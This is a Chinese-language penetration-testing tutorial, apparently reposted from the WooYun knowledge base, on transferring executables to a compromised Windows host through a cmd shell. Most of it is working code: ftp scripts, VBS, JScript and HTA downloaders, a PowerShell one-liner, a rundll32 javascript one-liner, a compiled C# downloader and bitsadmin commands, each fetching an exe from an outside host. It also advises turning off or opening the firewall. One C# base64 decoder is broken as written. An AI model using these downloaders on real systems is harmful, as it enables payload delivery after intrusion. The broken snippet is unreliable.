滲透技巧——透過cmd上傳檔案的N種方法

wyzsk發表於2020-08-19
作者: 三好學生 · 2016/04/05 10:23

0x00 前言

在滲透測試的過程中,常常需要向目標主機上傳檔案,我在最近的學習測試過程中就碰到了這個問題,要求只能透過cmd shell向目標主機(Windows系統)上傳檔案,所以本文就對該技巧做一下總結。

Alt text

圖片來自於http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11754089/Hacker-remotely-crashes-Jeep-from-10-miles-away.html

0x02 測試環境

OS:Win7 x86
test exe:ssss2.exe,成功執行後輸出1

0x03 通用上傳方法

1、 debug

debug是一個程式除錯工具,功能包括:

  • 直接輸入,更改,跟蹤,執行組合語言源程式
  • 觀察作業系統的內容
  • 檢視ROM BIOS的內容
  • 觀察更改RAM內部的設定值
  • 以扇區或檔案的方式讀寫軟盤資料

特別的是它還有一個功能可以將十六進位制程式碼轉換為可執行檔案:

Alt text

結合本文的目標,思路如下:

  1. 把需要上傳的exe轉換成十六進位制hex的形式
  2. 透過echo命令將hex程式碼寫入檔案
  3. 使用debug功能將hex程式碼還原出exe檔案

實際測試:

kali中的exe2bat.exe提供了這個功能,位於/usr/share/windows-binaries

如圖

Alt text

操作步驟:

kali:

#!bash
cd /usr/share/windows-binaries
wine exe2bat.exe ssss2.exe ssss2.txt

執行後會生成ssss2.txt,將裡面的內容複製貼上到cmd命令列下依次執行

執行後會生成1.dll、123.hex、ssss.exe

如圖

Alt text

注:
exe2bat不支援大於64kb的檔案 debug預設只支援在32位系統

如圖

Alt text

2、ftp

搭建好ftp伺服器:

ip:192.168.174.151
檔案:ssss2.exe

按順序執行如下程式碼即可透過ftp來下載檔案

cmd:

#!bash
echo open 192.168.174.151 21> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo ftp>> ftp.txt
echo GET ssss2.exe >> ftp.txt
ftp -s:ftp.txt

如圖

Alt text

注:
初次使用ftp下載防火牆會彈框攔截,使用前記得要先新增防火牆規則

3、vbs

vbs downloader,使用msxml2.xmlhttp和adodb.stream物件

如下程式碼儲存為.vbs檔案:

#!vb
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.174.145/ssss2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\update\ssss2.exe",2

對應到cmd下的命令為:

#!bash
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.174.145/ssss2.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "C:\test\update\ssss2.exe",2 >>download.vbs

按順序依次執行後會生成download.vbs,然後執行download.vbs即可實現下載ssss2.exe

4、powershell

cmd:

#!powershell
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.174.145/ssss2.exe','C:\test\update\ssss2.exe')

5、csc

csc.exe是微軟.NET Framework 中的C#編譯器,Windows系統中預設包含,可在命令列下將cs檔案編譯成exe

c# downloader的程式碼為:

#!csharp
using System.Net;
namespace downloader
{
    class Program
    {
        static void Main(string[] args)
        {
            WebClient client = new WebClient();
            string URLAddress = @"http://192.168.174.145/ssss2.exe";
            string receivePath = @"C:\test\update\";
            client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
        (URLAddress));
        }
    }
}

使用echo將程式碼依次寫入檔案download.cs中,然後呼叫csc.exe編譯cs檔案

執行

#!bash
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\update\download.exe C:\test\update\download.cs

如圖成功生成download.exe

Alt text

注:
csc.exe的絕對路徑要根據系統的.net版本來確定

6、JScript

相比於JSRat中用的Scripting.FileSystemObject

換用ADODB.Stream實現起來更加簡單高效

以下程式碼依次儲存為js檔案,直接執行即可實現下載檔案

#!js
var Object = WScript.CreateObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = WScript.CreateObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.Close();
}

合併成rundll32的一句話(類似於JSRat的啟動方式):

cmd:

#!bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();Object=new%20ActiveXObject("Microsoft.XMLHTTP");Object.open("GET","http://192.168.174.145/ssss2.exe",false);Object.send();if(Object.Status==200){Stream=new%20ActiveXObject("ADODB.Stream");Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile("C:\\test\\update\\ssss2.exe",2);Stream.Close();}

執行後會提示沒有許可權,很有趣的地方,更多的細節會在以後的文章介紹

Alt text

Alt text

7、hta

新增最小化和自動退出hta程式的功能,執行過程中會最小化hta視窗,下載檔案結束後自動退出hta程式

以下程式碼儲存為.hta檔案:

#!js
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.174.145/ssss2.exe",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\test\\update\\ssss2.exe", 2);
    Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</head>
<body>
</body>  
</html>

8、bitsadmin

bitsadmin是一個命令列工具,可用於建立下載或上傳工作和監測其進展情況。xp以後的Windows系統自帶

使用方法:

cmd下:

#!bash
bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip  C:\test\update\PSTools.zip

下載成功如圖:

Alt text

注:
不支援https、ftp協議
使用kali的simplehttpserver作伺服器會報錯

9、base64

將exe先作base64加密,透過cmd上傳後解密輸出 對exe作base64加密的方法:

(1)powershell

$PEBytes = [System.IO.File]::ReadAllBytes("C:\windows\system32\calc.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload

執行後會將C:\windows\system32\calc.exe作base64加密並輸出到base64.txt

(2)c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\windows\system32\calc.exe");
            String AsBase64String = Convert.ToBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\base64.txt");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

(3)eml附件

(思路由豬豬俠提供)

server2003 預設包含outlook客戶端C:\Program Files\Outlook Express

執行後-新建郵件-上傳附件-另存為eml格式

使用notepad開啟eml郵件,可看到加密的base64程式碼

如圖

enter image description here

解密base64檔案並生成exe的方法:

(1)powershell

$Base64Bytes = Get-Content (base64.txt)
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
Set-Content calc.exe -Value $PEBytes

(2)c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\test\base64.txt");
            String AsBase64String = Convert.FromBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\calc.exe");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

注: 讀檔案的操作可替換為base64程式碼直接寫入指令碼檔案中

0x04 補充上傳方法

以上均為系統預設包含的程式,結合以上方法並藉助於第三方工具也能夠實現功能

這裡介紹的思路是可先透過bitsadmin來下載第三方工具,然後利用第三方工具進行傳輸檔案

1、wget:

#!bash
bitsadmin /transfer n http://www.interlog.com/~tcharron/wgetwin-1_5_3_1-binary.zip  C:\test\update\wget.zip

執行後會下載wget的壓縮包wget.zip

注:
Windows系統預設不包含解壓縮zip檔案的命令,但是可以透過vbs來實現解壓縮zip檔案

vbs實現解壓縮:

以下程式碼儲存為.vbs檔案:

#!vb
UnZip "C:\test\update\wget.zip","C:\test\update\wget\"
Sub UnZip(ByVal myZipFile, ByVal myTargetDir)
    Set fso = CreateObject("Scripting.FileSystemObject")
    If NOT fso.FileExists(myZipFile) Then
        Exit Sub
    ElseIf fso.GetExtensionName(myZipFile) <> "zip" Then
        Exit Sub
    ElseIf NOT fso.FolderExists(myTargetDir) Then
        fso.CreateFolder(myTargetDir)
    End If
    Set objShell = CreateObject("Shell.Application")
    Set objSource = objShell.NameSpace(myZipFile)
    Set objFolderItem = objSource.Items()
    Set objTarget = objShell.NameSpace(myTargetDir)
    intOptions = 256
    objTarget.CopyHere objFolderItem, intOptions
End Sub

程式碼來自於http://demon.tw/programming/vbs-unzip-file.html

成功解壓縮後就可透過wget.exe來傳輸檔案

#!bash
C:\test\update\wget\wget.exe http://192.168.174.145/ssss2.exe

如圖

Alt text

2、ftfp

思路同上,先透過bitsadmin下載tftp.exe,然後利用tftp傳輸檔案

#!bash
bitsadmin /transfer n http://www.winagents.com/downloads/tftp.exe C:\test\update\tftp.exe

下載成功後利用tftp傳輸檔案:

#!bash
tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\test\update\ssss2.exe

注:
預設防火牆會攔截

關掉防火牆或者新增規則即可

如圖

Alt text

0x05 小結

本文對一些常用的透過cmd來傳輸檔案的技巧做了整理,側重於介紹其中較為通用簡便的方法,所以並未介紹其他需要配置開發環境的實現方法,如Python、Ruby、Php等,如果你有更好的實現方法,歡迎與我交流,共同學習。

0x06 參考資料

本文由三好學生原創並首發於烏雲drops,轉載請註明

本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章